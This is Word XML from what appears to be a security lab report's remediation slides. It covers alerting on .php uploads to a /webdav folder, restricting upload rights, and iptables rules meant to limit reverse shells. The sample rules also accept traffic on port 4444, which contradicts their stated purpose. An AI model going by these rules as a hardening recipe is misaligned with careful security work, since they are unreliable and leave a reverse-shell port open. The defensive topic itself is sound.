    <w:p w14:paraId="5161BAB5" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D448813" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="870"/>
          <w:tab w:val="left" w:pos="871"/>
        </w:tabs>
        <w:ind w:hanging="421"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Set an alert for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>any.php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 xml:space="preserve">ﬁle that is uploaded </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-22"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3924FDF8" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36"/>
        <w:ind w:left="870"/>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>webdav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2FEE5B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1447"/>
          <w:tab w:val="left" w:pos="1448"/>
        </w:tabs>
        <w:spacing w:line="198" w:lineRule="exact"/>
        <w:ind w:left="1447" w:hanging="421"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Remove the privilege of ﬁle upload over the web to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-21"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D7FC0A" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="16" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="1447" w:right="1123"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15776256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="049939FF" wp14:editId="0552A629">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4584690</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-831561</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="118691" cy="3901835"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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91" cy="390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/>
          <w:b/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
        <w:t>webdav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>folder with the exception of the local source only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ECE372" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1447"/>
          <w:tab w:val="left" w:pos="1448"/>
        </w:tabs>
        <w:spacing w:before="7" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1447" w:right="1582"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>‘iptables’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>write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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>bin/sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>script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whitelist speciﬁc IPs and limit port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADE881F" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="Heading7"/>
        <w:spacing w:line="244" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">iptables -A OUTPUT -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-ﬂags ALL SYN -m state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5618E2E7" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:before="13"/>
        <w:ind w:left="997"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>--state NEW -j DROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C5A95D" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1268"/>
        </w:tabs>
        <w:spacing w:before="31" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1267" w:right="1233" w:hanging="240"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Technically</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>clicked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reverse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>there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is little hope to prevent a reverse shell payload. Prevention of outbound TCP connections is one of the solutions to this, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">however, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>it seriously limits the system and disables internet access. Below is a piece of #</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/!bin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/sh script sample which can emulate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FF086A" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:line="170" w:lineRule="exact"/>
        <w:ind w:left="997"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables -A OUTPUT -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>conntrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>ctstate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>RELATED,ESTABLISHED</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F283C0" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:before="9" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="997" w:right="2937"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables -A OUTPUT -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> 80 -j ACCEPT iptables -A OUTPUT -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444 -j ACCEPT iptables -A OUTPUT -j REJECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB55442" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:line="252" w:lineRule="auto"/>
        <w:ind w:left="997" w:right="1123"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables -A INPUT -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>conntrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>ctstate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>RELATED,ESTABLISHED</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> -j ACCEPT iptables -A INPUT -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> 80 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336E5D64" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:line="183" w:lineRule="exact"/>
        <w:ind w:left="997"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables -A INPUT -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C019102" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:spacing w:line="183" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:sz w:val="14"/>
        </w:rPr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num="2" w:space="720" w:equalWidth="0">
            <w:col w:w="5300" w:space="1189"/>
            <w:col w:w="7451"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5324BEBC" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43B6174D" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BA8B91E" w14:textId="2A58A1F6" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="32" w:lineRule="exact"/>
        <w:ind w:left="144"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:sz w:val="3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:noProof/>
          <w:sz w:val="3"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EBD210D" wp14:editId="326D68C2">
                <wp:extent cx="8605520" cy="20320"/>
                <wp:effectExtent l="2540" t="4445" r="2540" b="3810"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5520" cy="20320"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="13552" cy="32"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1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" y="7"/>
                            <a:ext cx="13537" cy="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A8B6B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DC6C7D" id="Group 6" o:spid="_x0000_s1026" style="width:677.6pt;height:1.6pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="1355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">
                <v:line id="Line 7" o:spid="_x0000_s1027" style="position:absolute;visibility:visible;mso-wrap-style:square" from="7,7" to="13544,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" strokecolor="#a8b6bf"/>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D28D10" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:spacing w:line="32" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:sz w:val="3"/>
        </w:rPr>
        <w:sectPr w:rsidR="00377979">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="14400" w:h="8100" w:orient="landscape"/>
          <w:pgMar w:top="720" w:right="180" w:bottom="280" w:left="280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="727A7E7E" w14:textId="571B585B" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/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6768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3405723A" wp14:editId="1CBB438E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>274320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>274955</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8597900" cy="459549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97900" cy="4595495"/>
                          <a:chOff x="432" y="433"/>
                          <a:chExt cx="13540" cy="7237"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="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" y="433"/>
                            <a:ext cx="13540" cy="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6" y="721"/>
                            <a:ext cx="8130" cy="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6" y="781"/>
                            <a:ext cx="7950" cy="6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A94657" id="Group 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:21.6pt;margin-top:21.65pt;width:677pt;height:361.85pt;z-index:15776768;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="432,433" coordsize="13540,72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">
                <v:shape id="Picture 5" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:432;top:433;width:13540;height:7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">
                  <v:imagedata r:id="rId70" o:title=""/>
                </v:shape>
                <v:shape id="Picture 4" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:3136;top:721;width:8130;height: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">
                  <v:imagedata r:id="rId71" o:title=""/>
                </v:shape>
                <v:shape id="Picture 3" o:spid="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:3226;top:781;width:7950;height:6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">
                  <v:imagedata r:id="rId72" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6053A640" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="041DD678" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B97EAE" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="723D9ED1" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4102AE50" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE60C9B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A7E4C1B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A3A91AE" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F3B361" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07354AB0" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="227EE921" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79C24A63" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
